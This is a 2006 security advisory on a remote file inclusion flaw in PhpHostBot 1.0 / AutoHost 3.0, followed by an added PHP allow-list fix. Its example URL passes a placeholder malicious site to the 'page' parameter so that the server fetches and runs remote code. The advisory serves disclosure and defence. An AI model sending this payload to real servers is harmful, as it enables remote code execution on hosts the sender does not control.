by r0t,der4444,cembo,VietMafia

Thursday, July 20, 2006

PhpHostBot remote File Inclusion Vuln.

###############################################
Vuln. discovered by: r0t
Date: 20 July 2006
Vendor: www.idevspot.com/PhpHostBot.php
Affected versions: PhpHostBot 1.0 / AutoHost 3.0
###############################################

Vulnerability Description:

PhpHostBot contains a flaw that allows remote file inclusion, which can be exploited by malicious people to compromise a vulnerable system.
User input passed to the "page" parameter in "order/index.php" isn't properly verified before being used to include files. This can be exploited to include scripts from external resources by passing a URL to a remote site.

Example:

http://[victim]/order/index.php?page=http://[malicious_site]/file

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
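
One way to apply this fix, shown as an added example that is not PhpHostBot's own code: map the "page" parameter through an allow-list so the request value never reaches include as a path or URL. The page names, the pages/ directory and resolve_page() are hypothetical.

```php
<?php
// Added example: hypothetical page names and directory layout,
// not taken from PhpHostBot's source.

// Allow-list: public "page" value => fixed local file name.
const ALLOWED_PAGES = [
    'home'     => 'home.php',
    'plans'    => 'plans.php',
    'checkout' => 'checkout.php',
];

/**
 * Resolve a user-supplied page name to a file inside $baseDir.
 * Returns null for anything that is not on the allow-list.
 */
function resolve_page($requested, string $baseDir): ?string
{
    // Arrays (page[]=x) and other non-string input are rejected outright.
    if (!is_string($requested) || !array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . ALLOWED_PAGES[$requested]);
    // Defence in depth: the resolved file must exist and stay under $baseDir.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// The request value is only ever used as an array key, never as a path or URL.
$file = resolve_page($_GET['page'] ?? 'home', __DIR__ . '/pages');
if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $file;
```

Setting allow_url_include = Off in php.ini gives a second layer by stopping include from fetching URLs even if a code path is missed.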
More information @ unsecured-systems.com/forum/

Copyright (c) 2006 Pridels Sec Crew